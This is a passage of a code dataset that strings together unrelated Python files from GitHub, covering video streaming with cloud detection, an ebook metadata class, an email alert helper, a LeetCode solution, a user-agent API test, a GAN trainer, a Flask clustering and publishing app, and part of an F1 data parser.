! video/x-raw,format=NV12 ! omxh265enc ! mpegtsmux ! 
tcpserversink host=<tx2_server_IP> port=5000 recover-policy=keyframe sync-method=latest-keyframe sync=false\n# gst-launch-1.0 filesrc location=hncloud.mp4 ! decodebin ! x264enc ! mpegtsmux ! queue ! tcpserversink host=192.168.1.2 port=5000 recover-policy=keyframe sync-method=latest-keyframe sync=false\n# gst-launch-1.0 filesrc location=hncloud.mp4 ! decodebin ! omxh265enc ! mpegtsmux ! tcpserversink host=192.168.1.2 port=5000\n\n# hncloud.mp4 fps=30 shape(728, 858)\nimport cv2\nfrom CloudDetect import *\n\n# On Jetson\n# fourcc = cv2.VideoWriter_fourcc('M','J','P','G')\n# out = cv2.VideoWriter('appsrc ! videoconvert ! omxh265enc ! mpegtsmux ! tcpserversink host=192.168.1.2 port=5000 sync=false', fourcc, 30.0, (w, h), True)\n\n# On PC\ncap = cv2.VideoCapture('video/hncloud.mp4')\nw = 1200\nh = 900\n# w = 800\n# h = 600\n\n# Allow to send to client (percent %)\nsendingThreshold = 30\n\nfourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G')\nout = cv2.VideoWriter(\n 'appsrc ! videoconvert ! x264enc ! mpegtsmux ! tcpserversink host=192.168.1.1 port=5000 recover-policy=keyframe sync-method=latest-keyframe sync=false', fourcc, 30.0, (w, h), True)\n\nif (not out.isOpened()):\n print(\"not OKEEE\")\n\ncountFrame = 0\nwhile cap.isOpened():\n ret, frame = cap.read()\n if ret:\n\n frame = cv2.resize(frame, (w, h), interpolation=cv2.INTER_CUBIC)\n\n # Cloud Detection\n if (countFrame < 1):\n threshold = Kmean(frame)\n cloudFrame = CloudThreshold(frame, threshold)\n totalCloud = TotalCloud(frame, threshold)\n\n # percent Cloud\n percetCloud = round(totalCloud/(w*h) * 100, 0)\n if (percetCloud > sendingThreshold):\n print('Frame: ' + str(countFrame) + ' has ' + str(percetCloud) + '%' + ' will not send')\n else:\n print('Frame: ' + str(countFrame) + ' has ' + str(percetCloud) + '%' + ' will send')\n out.write(frame)\n\n # Show\n cv2.imshow('sender', cloudFrame)\n countFrame = countFrame + 1\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n# Release everything if job is finished\ncap.release()\nout.release()\ncv2.destroyAllWindows()\n","repo_name":"guiltylotus/JetsonToPC","sub_path":"Sender_Jetson2.py","file_name":"Sender_Jetson2.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26297795899","text":"from fanfic import FanFic\nfrom fanfic import Author\n\nclass FanFicEBook(FanFic):\n _FilePath = ''\n _Packaged = ''\n _Tags = []\n _Pairings = []\n _Publisher = ''\n\n def __init__(self):\n self._Url = \"\"\n self._Title = \"\"\n self._Published = \"\"\n self._Updated = \"\"\n self._CharactersString = \"\"\n self._Summary = \"\"\n self._Rating = \"\"\n self._GenreString = \"\"\n self._Words = 0\n self._Characters = []\n self._Relationships = []\n self._Fandoms = []\n self._Chapters = 0\n self._FFNetID = \"\"\n self._FicID = 0\n self._Status = ''\n self._Genres = []\n self._Author = Author()\n self._FilePath = ''\n self._Packaged = ''\n self._Tags = []\n self._Pairings = []\n self._Publisher = ''\n\n def reset(self):\n self._Url = \"\"\n self._Title = \"\"\n self._Published = \"\"\n self._Updated = \"\"\n self._CharactersString = \"\"\n self._Summary = \"\"\n self._Rating = \"\"\n self._GenreString = \"\"\n self._Words = 0\n self._Characters = []\n self._Relationships = []\n self._Fandoms = []\n self._Chapters = 0\n self._FFNetID = \"\"\n self._FicID = 0\n self._Genres = []\n self._Author.reset()\n self._Status = ''\n self._FilePath = ''\n self._Packaged = ''\n self._Tags = []\n 
self._Pairings = []\n        self._Publisher = ''\n\n\n    @property\n    def FilePath(self):\n        return self._FilePath\n\n    @FilePath.setter\n    def FilePath(self, vsFilePath):\n        self._FilePath = vsFilePath\n\n    @property\n    def Packaged(self):\n        return self._Packaged\n\n    @Packaged.setter\n    def Packaged(self, vsPackaged):\n        self._Packaged = vsPackaged\n\n    @property\n    def Tags(self):\n        return self._Tags\n\n    @Tags.setter\n    def Tags(self, vTags):\n        self._Tags = vTags\n\n    @property\n    def Pairings(self):\n        return self._Pairings\n\n    @Pairings.setter\n    def Pairings(self, vs_Pairings):\n        self._Pairings = vs_Pairings\n\n    @property\n    def Publisher(self):\n        return self._Publisher\n\n    @Publisher.setter\n    def Publisher(self, vsPublisher):\n        self._Publisher = vsPublisher\n\n\n\n","repo_name":"aragorn55/EpubDB","sub_path":"fic_file.py","file_name":"fic_file.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17313973309","text":"import smtplib\nfrom email.mime.text import MIMEText\n#from email.mime.multipart import MIMEMultipart\nfrom log import logit\n\nfrom_ = ''\npswd = ''\nhost = ''\nport = 465\n\ndef sendmail(to_,sub_,main_=\"molebot.com\"):\n    server = smtplib.SMTP_SSL()\n    logit(str(server.connect(host,port)))\n    logit((server.login(from_,pswd)))\n    msg = MIMEText(main_)\n    msg['From'] = from_\n    msg['To'] = to_\n    msg['Subject'] = sub_\n    logit(str(server.sendmail(from_,to_,msg.as_string())))\n    logit('qqmail ok')\n    server.quit()\n    \ndef alertmail(sub_,main_=\"from molebot.com\"):\n    sendmail('botbot@189.cn',sub_,main_)\n\n#alertmail('begin','ok')","repo_name":"rlcjj/web_ctp-1","sub_path":"zmq_server/qqmail.py","file_name":"qqmail.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"17086870215","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n    def maxPoints(self, points: List[List[int]]) -> int:\n        n = len(points)\n        if n<=2:\n            return n\n        \n        def getSlope(p1, p2):\n            x1, y1 = p1\n            x2, y2 = p2\n            if x1==x2:\n                return 1000000007\n            return (y2-y1)/(x2-x1)\n        \n        ans = 1\n        for i in range(n):\n            d = defaultdict(int)\n            for j in range(i+1, n):\n                slope = getSlope(points[i], points[j])\n                d[slope] += 1\n                ans = max(d[slope], ans)\n        return ans+1\n    ","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"0149-max-points-on-a-line/0149-max-points-on-a-line.py","file_name":"0149-max-points-on-a-line.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"44142570107","text":"import requests\nimport json\n\n\nuser_agents = ['Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, '\n               'like Gecko) Version/4.0 Mobile Safari/534.30', 'Mozilla/5.0 (iPad; CPU OS 13_2 like Mac OS X) '\n                                                               'AppleWebKit/605.1.15 (KHTML, like Gecko) '\n                                                               'CriOS/91.0.4472.77 Mobile/15E148 Safari/604.1',\n               'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',\n               'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n               'Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.100.0',\n               'Mozilla/5.0 (iPad; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) '\n               'Version/13.0.3 Mobile/15E148 Safari/604.1']\n\nplatforms = ['Mobile', 'Mobile', 'Googlebot', 'Web', 'Mobile']\nbrowsers = ['No', 'Chrome', 'Unknown', 'Chrome', 'No']\ndevices = ['Android', 'iOS', 'Unknown', 'No', 'iPhone']\n\ni = 0\n\nwhile 
i <= 4:\n    response = requests.get(\n        \"https://playground.learnqa.ru/ajax/api/user_agent_check\",\n        headers={\"User-Agent\": user_agents[i]}\n    )\n\n    json_text = response.text\n    response_dict = json.loads(json_text)\n    v_platform = response_dict['platform']\n    v_browser = response_dict['browser']\n    v_device = response_dict['device']\n\n    if platforms[i] != v_platform:\n        print(\"Platform value does not match, expected:\", platforms[i], \"but the response returned\", v_platform,\n              \"wrong UserAgent:\", user_agents[i])\n\n    if browsers[i] != v_browser:\n        print(\"Browser value does not match, expected:\", browsers[i], \"but the response returned\", v_browser,\n              \"wrong UserAgent:\", user_agents[i])\n\n    if devices[i] != v_device:\n        print(\"Device value does not match, expected:\", devices[i], \"but the response returned\", v_device,\n              \"wrong UserAgent:\", user_agents[i])\n\n    i += 1\n\n\n\n","repo_name":"QuakeXpresS/LearnQA_PythonAPI","sub_path":"Ex13.py","file_name":"Ex13.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"4775834888","text":"\nfrom fastgan.fastganmodels import FastGANBaseModel\nfrom fastgan.fastgannets import SimpleGenerator, SimpleDescriminator \nfrom fastgan.fastgantrainer import FastGANTrainer\n\nfrom torchvision import datasets, transforms\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\n\n\nclass MnistSimpleGAN(FastGANBaseModel):\n    \n    def __init__(self, db, pid, expid):\n        super().__init__(db, pid, expid)\n\n        self.gt = MNIST_trainer(self)\n    \n\n    \n\n    def prepare_data(self):\n        hyperparams = self.recorder.get_hyper_params()\n        dataroot = self.recorder.get_exp_info(\"expDataPath\")\n\n        transform = transforms.Compose([\n                transforms.ToTensor(),\n                transforms.Normalize(mean=(0.5,), std=(0.5,))])\n\n        self.dataset = datasets.MNIST(root=dataroot, train=True, transform=transform, download=True)\n\n        self.dataloader = torch.utils.data.DataLoader(dataset=self.dataset, \n                                           batch_size=int(hyperparams[\"batch_size\"]), \n                                           shuffle=True)\n\n        self.recorder.record_dataloader_size(len(self.dataloader))\n\n    def set_device(self):\n        hyperparams = self.recorder.get_hyper_params()\n        self.device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and \n                                                int(hyperparams[\"ngpu\"]) > 0) else \"cpu\")\n\n\n    \n    def generate_input_image_grid(self, path):\n\n        self.prepare_data()\n        self.set_device()\n\n        real_data_batch = next(iter(self.dataloader))\n        # real_data_batch = real_data_batch.view(real_data_batch.size(0), 1, 28, 28)\n        vutils.save_image(real_data_batch[0].to(self.device)[:64], path, nrow=8, padding=2)\n\n    def init_nets(self):\n        hyperparams = self.recorder.get_hyper_params()\n\n        self.netG = SimpleGenerator(int(hyperparams[\"ngpu\"]),\n                            int(hyperparams[\"nz\"]))\n\n        self.netD = SimpleDescriminator(int(hyperparams[\"ngpu\"]))\n\n        self.netG.to(self.device)\n        self.netD.to(self.device)\n\n    def init_criterion(self):\n        self.criterion = nn.BCELoss()\n\n    def init_optimizers(self):\n        hyperparams = self.recorder.get_hyper_params()\n        self.optimizerD = optim.Adam(self.netD.parameters(), lr=float(hyperparams[\"lr\"]), \n                                    betas=(float(hyperparams[\"beta1\"]), 0.999)\n                                    )\n        self.optimizerG = optim.Adam(self.netG.parameters(), lr=float(hyperparams[\"lr\"]), \n                                    betas=(float(hyperparams[\"beta1\"]), 0.999)\n                                    )\n\n    \n\n\n    \n\nclass MNIST_trainer(FastGANTrainer):\n    def __init__(self, gan):\n        super().__init__(gan)\n\n    
def train(self, num_epochs):\n # self.total_epochs = int(self.gan.recorder.get_exp_info(\"total_epochs\")) + 1\n\n hyperparams = self.gan.recorder.get_hyper_params()\n\n print(\"Train method is working ...================\")\n\n for epoch in range(num_epochs):\n\n for i, (images, _) in enumerate(self.gan.dataloader):\n\n bs = images.shape[0]\n #print(bs)\n images = images.view(bs, -1).cuda()\n images = Variable(images)\n # print(\"image size =\", images.shape)\n # Create the labels which are later used as input for the BCE loss\n real_labels = torch.ones(bs, 1).cuda()\n real_labels = Variable(real_labels)\n fake_labels = torch.zeros(bs, 1).cuda()\n fake_labels = Variable(fake_labels)\n\n # ================================================================== #\n # Train the discriminator #\n # ================================================================== #\n self.gan.netD.zero_grad()\n # Compute BCE_Loss using real images where BCE_Loss(x, y): - y * log(D(x)) - (1-y) * log(1 - D(x))\n # Second term of the loss is always zero since real_labels == 1\n outputs = self.gan.netD(images)\n d_loss_real = self.gan.criterion(outputs, real_labels)\n real_score = outputs\n \n # Compute BCELoss using fake images\n # First term of the loss is always zero since fake_labels == 0\n z = torch.randn(bs, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n fake_images = self.gan.netG(z)\n outputs = self.gan.netD(fake_images)\n d_loss_fake = self.gan.criterion(outputs, fake_labels)\n fake_score = outputs\n \n # Backprop and optimize\n # If D is trained so well, then don't update\n d_loss = d_loss_real + d_loss_fake\n \n d_loss.backward()\n self.gan.optimizerD.step()\n # ================================================================== #\n # Train the generator #\n # ================================================================== #\n self.gan.netG.zero_grad()\n # Compute loss with fake images\n z = torch.randn(bs, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n fake_images = self.gan.netG(z)\n outputs = self.gan.netD(fake_images)\n \n # We train G to maximize log(D(G(z)) instead of minimizing log(1-D(G(z)))\n # For the reason, see the last paragraph of section 3. 
https://arxiv.org/pdf/1406.2661.pdf\n g_loss = self.gan.criterion(outputs, real_labels)\n \n # Backprop and optimize\n # if G is trained so well, then don't update\n #reset_grad()\n g_loss.backward()\n self.gan.optimizerG.step()\n \n\n #print(\"Finisjhed============\")\n self.gan.recorder.record_iters(i +1)\n print(i)\n\n \n \n print(\"Finished iters\")\n # self.gan.recorder.record_exp_info(\"total_epochs\", int(self.total_epochs))\n self.gan.recorder.add_total_epoch()\n print(\"add total epoch\")\n self.gan.recorder.record_iters(0) # reset iters\n\n current_total_epoch = self.gan.recorder.read_total_epoch()\n\n\n # after read total epoch, collect plot data\n # recording stats to plot\n self.gan.recorder.record_train_stat(current_total_epoch, \"d_loss\", d_loss.item())\n self.gan.recorder.record_train_stat(current_total_epoch, \"g_loss\", g_loss.item())\n \n\n\n self.save_checkpoint(current_total_epoch, \"EPOCH\") # save model for each epoch\n self.save_generator_progress(current_total_epoch, 64)\n\n self.gan.recorder.record_exp_info(\"current_epoch\", epoch +1) #update current epoch\n self.gan.recorder.record_exp_info(\"current_epoch\", 0) # reset current epoch to 0\n\n\n def save_inference_output(self, iter, num_of_samples):\n \"\"\"\n To save the output of trained checkpoints\n \"\"\"\n hyperparams = self.gan.recorder.get_hyper_params()\n \n z = torch.randn(num_of_samples, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n\n imgpath = self.gan.recorder.add_image(\"INFERENCED\", iter=iter) \n self.gan.netG.eval()\n fake = self.gan.netG(z).detach().cpu()\n vutils.save_image(fake.view(num_of_samples, 1, 28, 28), imgpath, nrow=8, padding=2)\n print(\"Inferenced Image saved\")\n\n def save_generator_progress(self, iter, num_of_samples):\n imgpath = self.gan.recorder.add_image(\"GENDATA\", iter=iter)\n hyperparams = self.gan.recorder.get_hyper_params()\n \n z = torch.randn(num_of_samples, int(hyperparams[\"nz\"])).cuda()\n z = Variable(z)\n with torch.no_grad():\n fake = self.gan.netG(z).detach().cpu()\n vutils.save_image(fake.view(num_of_samples, 1, 28, 28), imgpath, nrow=8, padding=2)\n \n\n\n\n\n\n\n\n","repo_name":"vlbthambawita/GANExFlask","sub_path":"GANEX/FastGAN_examples/mnistgan_example.py","file_name":"mnistgan_example.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20642840302","text":"# Ocean Protocol (Outlier Ventures' abstraction)\nimport register as reg\n\n# OrbitDB\nfrom Naked.toolshed.shell import execute_js\n\n# Azure Storage\nimport uuid, sys\nfrom azure.storage.blob import BlockBlobService, PublicAccess\n\n# Flask\nfrom flask import Flask, request, jsonify\n\n# Utilities\nimport os, shutil, json, requests, logging, random, string\n\n# Clustering\nfrom sklearn.cluster import KMeans\nimport pandas as pd\nimport matplotlib\n# Run matplotlib in headless mode, prevents NSWindow crash\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\n\n\n# declare constants\nHOST = '0.0.0.0'\nPORT = 8081\n\n# initialize flask application\napp = Flask(__name__)\nlog = logging.getLogger('werkzeug')\nlog.setLevel(logging.ERROR)\n\n\n@app.route('/api/orbit', methods=['POST'])\ndef get_orbit():\n\n # OrbitDB writeflag issue workaround: delete local copy on query\n if os.path.exists('orbitdb'):\n shutil.rmtree('orbitdb')\n\n if os.path.exists('data.json'):\n os.remove('data.json')\n\n # Get parameters for OrbitDB\n parameters = request.get_json()\n\n # Write OrbitDB address to file\n 
output = {\n \"address\": parameters['address']\n }\n with open('config.json', 'w') as outfile:\n json.dump(output, outfile)\n\n execute_js('orbit.js')\n\n # Read in dataframe\n try:\n data = pd.read_json('data.json')\n df = data.values[:, [0, 1]]\n \n # Plot original\n plt.figure(1)\n plt.scatter(df[:, 0], df[:, 1])\n plt.savefig('../frontend/src/assets/images/before.png')\n plt.close()\n\n except:\n print('No OrbitDB database found.')\n\n return ('', 200)\n\n\n@app.route('/api/train', methods=['POST'])\ndef train():\n\n # OrbitDB writeflag issue workaround: delete local copy on query\n if os.path.exists('orbitdb'):\n shutil.rmtree('orbitdb')\n\n if os.path.exists('output.json'):\n os.remove('output.json')\n\n # Get parameters for clustering\n parameters = request.get_json()\n\n # Read in dataframe\n try:\n data = pd.read_json('data.json')\n df = data.values[:, [0, 1]]\n except:\n print('No OrbitDB database found.')\n\n # K-means cluster\n kmeans = KMeans(n_clusters = int(parameters['clusters']))\n kmeans.fit(df)\n prediction = kmeans.predict(df)\n centers = kmeans.cluster_centers_\n\n # Write clustered output to file\n output = {\n \"data\": df.tolist(),\n \"cluster\": prediction.tolist(),\n \"centroids\": centers.tolist()\n }\n with open('output.json', 'w') as outfile:\n json.dump(output, outfile)\n\n # Plot result\n plt.figure(2)\n plt.scatter(df[:, 0], df[:, 1], c = prediction)\n plt.scatter(centers[:, 0], centers[:, 1], s = 200, alpha = 0.5)\n plt.savefig('../frontend/src/assets/images/after.png')\n plt.close()\n\n '''\n Testing only, if you have ground truth:\n K-means is not classification, so accuracy doesn't really apply.\n Nevertheless, labels can be loaded for an 'accuracy' metric:\n truth = data['t'].values\n Compare to the 'prediction' array. 
Note you may have to use the\n random_state parameter so that cluster ordering is deterministic.\n '''\n\n return ('', 200)\n\n\n@app.route('/api/ocean', methods=['POST'])\ndef publish_asset():\n\n # Get parameters for clustering\n parameters = request.get_json()\n\n '''\n # Uncomment this for OrbitDB hosting (PoC, not Ocean testnet compatible yet)\n execute_js('host.js')\n with open('host.json', 'r') as infile:\n host = json.load(infile)\n '''\n\n\n # Azure storage hosting\n azure_account = parameters['azureaccount']\n\n # Unique container name - requires non-collision * under a single Azure account *\n # 36^4=1679616 possibilities, Pr[collision] = 1 - ( (36^4-1)/36^4 )^num_datasets_created\n container_name = parameters['containername']\n\n # Generate machine-readable download link to hosted dataset\n azure_url = 'https://' + azure_account + '.blob.core.windows.net/' + container_name + '/output.json'\n\n try:\n # Create service used to call the Blob service for the storage account\n block_blob_service = BlockBlobService(account_name = azure_account, account_key = parameters['azurekey'])\n\n # Create container with name = asset_id\n block_blob_service.create_container(container_name)\n\n # Make public\n block_blob_service.set_container_acl(container_name, public_access = PublicAccess.Container)\n\n # Create and upload blob\n block_blob_service.create_blob_from_path(container_name, 'output.json', 'output.json')\n\n except Exception as e:\n print(e)\n\n\n # Outlier Ventures' abstraction for easy registration with Keeper and Aquarius\n reg.simple_register(parameters['name'],\n parameters['price'],\n parameters['description'],\n parameters['author'],\n azure_url)\n\n\n return ('', 200)\n\n\nif __name__ == '__main__':\n\n # Run web server\n app.run(host = HOST,\n debug = False, # Enable for auto-reload. 
Not for production.\n port = PORT)\n","repo_name":"OutlierVentures/H2O","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"9543730832","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\ndef growth_scatter(df):\n fig=go.Figure()\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Confirmed\"],\n mode='lines+markers',\n name='Confirmed Cases'))\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Recovered\"],\n mode='lines+markers',\n name='Recovered Cases'))\n fig.add_trace(go.Scatter(x=df.index, y=df[\"Deaths\"],\n mode='lines+markers',\n name='Death Cases'))\n fig.update_layout(title=\"Growth of different types of cases\",\n xaxis_title=\"Date\",yaxis_title=\"Number of Cases\",legend=dict(x=0,y=1,traceorder=\"normal\"))\n\n st.write(fig)\n\ndef weekly_increase(df):\n week_num=[]\n weekwise_confirmed=[]\n weekwise_recovered=[]\n weekwise_deaths=[]\n w=1\n for i in list(df[\"WeekOfYear\"].unique()):\n weekwise_confirmed.append(df[df[\"WeekOfYear\"]==i][\"Confirmed\"].iloc[-1])\n weekwise_recovered.append(df[df[\"WeekOfYear\"]==i][\"Recovered\"].iloc[-1])\n weekwise_deaths.append(df[df[\"WeekOfYear\"]==i][\"Deaths\"].iloc[-1])\n week_num.append(w)\n w=w+1\n\n fig = plt.figure(figsize=(8,5))\n plt.plot(week_num,weekwise_confirmed,linewidth=3)\n plt.plot(week_num,weekwise_recovered,linewidth=3)\n plt.plot(week_num,weekwise_deaths,linewidth=3)\n plt.ylabel(\"Number of Cases\")\n plt.xlabel(\"Week Number\")\n plt.title(\"Weekly progress of Different Types of Cases\")\n # plt.xlabel\n st.pyplot(fig)\n\n fig, (ax1,ax2) = plt.subplots(1, 2,figsize=(15,5))\n sns.barplot(x=week_num,y=pd.Series(weekwise_confirmed).diff().fillna(0),ax=ax1)\n sns.barplot(x=week_num,y=pd.Series(weekwise_deaths).diff().fillna(0),ax=ax2)\n ax1.set_xlabel(\"Week Number\")\n ax2.set_xlabel(\"Week Number\")\n ax1.set_ylabel(\"Number of Confirmed Cases\")\n ax2.set_ylabel(\"Number of Death Cases\")\n ax1.set_title(\"Weekly increase in Number of Confirmed Cases\")\n ax2.set_title(\"Weekly increase in Number of Death Cases\")\n\n st.pyplot(fig)\n\ndef mortality(df):\n df[\"Mortality Rate\"]=(df[\"Deaths\"]/df[\"Confirmed\"])*100\n df[\"Recovery Rate\"]=(df[\"Recovered\"]/df[\"Confirmed\"])*100\n df[\"Active Cases\"]=df[\"Confirmed\"]-df[\"Recovered\"]-df[\"Deaths\"]\n df[\"Closed Cases\"]=df[\"Recovered\"]+df[\"Deaths\"]\n\n st.write(\"Average Mortality Rate = \",f'{df[\"Mortality Rate\"].mean():.2f}')\n st.write(\"Median Mortality Rate = \",f'{df[\"Mortality Rate\"].median():.2f}')\n st.write(\"Average Recovery Rate = \",f'{df[\"Recovery Rate\"].mean():.2f}')\n st.write(\"Median Recovery Rate = \",f'{df[\"Recovery Rate\"].median():.2f}')\n\n #Plotting Mortality and Recovery Rate \n fig = make_subplots(rows=2, cols=1,\n subplot_titles=(\"Recovery Rate\", \"Mortatlity Rate\"))\n fig.add_trace(\n go.Scatter(x=df.index, y=(df[\"Recovered\"]/df[\"Confirmed\"])*100,name=\"Recovery Rate\"),\n row=1, col=1\n )\n fig.add_trace(\n go.Scatter(x=df.index, y=(df[\"Deaths\"]/df[\"Confirmed\"])*100,name=\"Mortality Rate\"),\n row=2, col=1\n )\n fig.update_layout(height=1000,legend=dict(x=0,y=0.5,traceorder=\"normal\"))\n fig.update_xaxes(title_text=\"Date\", row=1, col=1)\n fig.update_yaxes(title_text=\"Recovery Rate\", row=1, col=1)\n 
fig.update_xaxes(title_text=\"Date\", row=2, col=1)\n    fig.update_yaxes(title_text=\"Mortality Rate\", row=2, col=1)\n\n    st.write(fig)\n\ndef growth_factor(df):\n    daily_increase_confirm=[]\n    daily_increase_recovered=[]\n    daily_increase_deaths=[]\n    for i in range(df.shape[0]-1):\n        daily_increase_confirm.append(((df[\"Confirmed\"].iloc[i+1]/df[\"Confirmed\"].iloc[i])))\n        daily_increase_recovered.append(((df[\"Recovered\"].iloc[i+1]/df[\"Recovered\"].iloc[i])))\n        daily_increase_deaths.append(((df[\"Deaths\"].iloc[i+1]/df[\"Deaths\"].iloc[i])))\n    daily_increase_confirm.insert(0,1)\n    daily_increase_recovered.insert(0,1)\n    daily_increase_deaths.insert(0,1)\n\n    fig = plt.figure(figsize=(15,7))\n    plt.plot(df.index,daily_increase_confirm,label=\"Growth Factor Confirmed Cases\",linewidth=3)\n    plt.plot(df.index,daily_increase_recovered,label=\"Growth Factor Recovered Cases\",linewidth=3)\n    plt.plot(df.index,daily_increase_deaths,label=\"Growth Factor Death Cases\",linewidth=3)\n    plt.xlabel(\"Timestamp\")\n    plt.ylabel(\"Growth Factor\")\n    plt.title(\"Growth Factor of different Types of Cases\")\n    plt.axhline(1,linestyle='--',color='black',label=\"Baseline\")\n    plt.xticks(rotation=90)\n    plt.legend()\n\n    st.pyplot(fig)\n\ndef daily_increase(df):\n    st.write(\"Average increase in number of Confirmed Cases every day: \",np.round(df[\"Confirmed\"].diff().fillna(0).mean()))\n    st.write(\"Average increase in number of Recovered Cases every day: \",np.round(df[\"Recovered\"].diff().fillna(0).mean()))\n    st.write(\"Average increase in number of Deaths Cases every day: \",np.round(df[\"Deaths\"].diff().fillna(0).mean()))\n\n    fig=go.Figure()\n    fig.add_trace(go.Scatter(x=df.index, y=df[\"Confirmed\"].diff().fillna(0),mode='lines+markers',\n                            name='Confirmed Cases'))\n    fig.add_trace(go.Scatter(x=df.index, y=df[\"Recovered\"].diff().fillna(0),mode='lines+markers',\n                            name='Recovered Cases'))\n    fig.add_trace(go.Scatter(x=df.index, y=df[\"Deaths\"].diff().fillna(0),mode='lines+markers',\n                            name='Death Cases'))\n    fig.update_layout(title=\"Daily increase in different types of Cases\",\n                     xaxis_title=\"Date\",yaxis_title=\"Number of Cases\",legend=dict(x=0,y=1,traceorder=\"normal\"))\n    st.write(fig)\n\ndef double_days(df):\n    c=1000\n    double_days=[]\n    C=[]\n    while(1):\n        double_days.append(df[df[\"Confirmed\"]<=c].iloc[[-1]][\"Days Since\"][0])\n        C.append(c)\n        c=c*2\n        if(c<df[\"Confirmed\"].max()):\n            continue\n        else:\n            break\n\n    doubling_rate=pd.DataFrame(list(zip(C,double_days)),columns=[\"Cases\",\"Days since first Case\"])\n    doubling_rate[\"Doubling Days\"]=doubling_rate[\"Days since first Case\"].diff().fillna(doubling_rate[\"Days since first Case\"])\n\n    st.write(doubling_rate)\n","repo_name":"aws-samples/cloud-experiments","sub_path":"api/streamlit_experiments/covid.py","file_name":"covid.py","file_ext":"py","file_size_in_byte":6268,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"37"}
{"seq_id":"36453740254","text":"#!/usr/bin/python3\n\n\"\"\"append function\"\"\"\n\n\ndef append_after(filename=\"\", search_string=\"\", new_string=\"\"):\n    \"\"\"inserts new_string after each line that contains search_string\"\"\"\n    with open(filename, 'r+', encoding='utf-8') as f:\n        y = f.readlines()\n        f.seek(0)\n\n        for x in y:\n            f.write(x)\n            if search_string in x:\n                f.write(new_string)\n\n        
f.truncate()\n","repo_name":"mwanyambu/alx-higher_level_programming","sub_path":"0x0B-python-input_output/100-append_after.py","file_name":"100-append_after.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73373201388","text":"\"\"\"Helper functions for parsing and transforming raw F1 data.\n\nThis module provides a collection of utility functions to decode, \nnormalize, and prepare raw F1 data (either historical or real-time)\nbefore indexing into MongoDB. This includes JSON decoding, data type casting,\nkey modifications, array exploding, and more.\n\"\"\"\n\nfrom typing import List, Dict, Iterator, Optional, Union, Any\nimport json\nfrom functools import lru_cache\nfrom collections import defaultdict\nimport base64\nimport zlib\nfrom datetime import datetime\nfrom util import to_datetime\n\n\ndef _decode(raw: str) -> Dict:\n \"\"\"Decodes raw F1 data from either JSON or Base64 encoded compressed JSON\"\"\"\n try:\n return json.loads(raw.strip('\"'))\n except:\n s = zlib.decompress(base64.b64decode(raw), -zlib.MAX_WBITS)\n return json.loads(s.decode('utf-8-sig'))\n\n\ndef _is_number(s: Any) -> bool:\n \"\"\"Checks if the given argument can be converted to a float\"\"\"\n try:\n float(s)\n return True\n except ValueError:\n return False\n\n@lru_cache(maxsize=None)\ndef _is_identifier(s: Any) -> bool:\n \"\"\"Checks if the given argument is an identifier (a team name, a driver number, ...)\"\"\"\n TEAM_NAMES = {\n 'Red Bull Racing Honda RBPT',\n 'Mercedes',\n 'Aston Martin Aramco Mercedes',\n 'Ferrari',\n 'Alpine Renault',\n 'McLaren Mercedes',\n 'Haas Ferrari',\n 'Alfa Romeo Ferrari',\n 'Williams Mercedes',\n 'AlphaTauri Honda RBPT',\n }\n return (\n _is_number(s)\n or s in TEAM_NAMES\n or (len(s) >= 2 and s[0] == 'p' and s[1].isupper())\n )\n\ndef _add_key(obj: Any, key: Any) -> Any:\n \"\"\"Utility function to store the key information from a flattened dict\"\"\"\n if isinstance(obj, dict):\n key_field = '_key'\n while key_field in set(obj.keys()):\n key_field = '_' + key_field\n obj[key_field] = key\n return obj\n elif isinstance(obj, list):\n return [_add_key(e, key=key) for e in obj]\n else:\n return {\n '_key': key,\n '_val': obj,\n }\n\ndef _remove_key_identifiers(obj: Any) -> Any:\n \"\"\"Transforms `obj` such that there are no more identifiers (team name, driver number, ...)\n as dictionary keys. 
